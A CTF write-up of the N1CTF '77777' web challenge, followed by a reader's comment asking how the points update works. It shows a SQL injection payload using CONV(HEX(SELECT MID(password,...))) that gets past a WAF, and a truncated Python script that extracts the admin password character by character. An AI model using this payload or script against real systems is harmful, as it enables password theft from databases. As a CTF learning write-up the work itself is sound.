Rating: 5.0
N1CTF - 77777 Write-up
-------------------------
Category: Web
Points: 1000 (Dynamic scoring, goes down when more people solve it)
Description:
```
"77777" is my girlfriend's nicknameļ¼have fun xdd:)
hk node: http://47.75.14.48
cn node: http://47.97.168.223
(Two challenge servers are identical, use either of them.)
```
Upon visiting the site we're shown two very big hints, ``U can update my points in Profile.`` and ``And the flag is `admin's password`:)``, upon visiting the rest of the pages we can see the "profile" which just simply displays the amount of Points they have, on the "Somecode" page we get a screenshot of the code running in the background, and on the someinfo page we get a screenshot which displays what software is running on the server.
Somecode Picture:
After reading over the code it's obvious that the $points variable is vulnerable to SQL Injection, however it is also running through a waf function which we don't have the code for. After doing some research on different ways I could exploit it, I discovered a technique [here]() about using CONV(hex((query))) to extract data, after struggling on trying to get it working for ages, I FINALLY got it working using this query ``*CONV(HEX((SELECT MID(password,1,3))),16,10)``. For anyone who isn't familiar with the functions in the statement I'll break them down for you, MID allows you to obtain a substring of the field (I couldn't use SUBSTRING because it was blocked by the waf :( ), the format is ``MID(field, <starting position>, <length>)``, after some more fiddling around I wrote a quick python script to automate it for me and do the decoding.
```
import requests
import re
from time import sleep
s = requests.Session()
regex = "\|\s[\d]+<br" # Regex to extract the current points
flag = "1"
i = 1
password = ""
def dec2hex(dec):
result = s.get("https://www.binaryhexconverter.com/hesapla.php?fonksiyon=dec2hex°er={}&pad=false&v=2".format(dec))
return result.text
while True:
hi = '*CONV(HEX((SELECT MID(password,{},1))),16,10)'.format(i)
postData = {
"flag":flag,
"hi":hi
}
url = "http://47.75.14.48/"
attack = s.post(url, data=postData, proxies=proxyDict)
result = re.findall(regex, attack.text)
if len(result) > 0:
dechex = result[0].replace("| ","").replace("
I missed something on this one.. I found all the clues you present but I never could modify the points...
I tried with the simpliest POST data : flag=1&hi=1 and some others, to some complexe SQLi. I never did a single update....
Can you tel me how I could modify points regularly (without SQLi) ? And where the fuck "sorry" message if fail was displayed...
Thx you mate for tour well explain writeup !
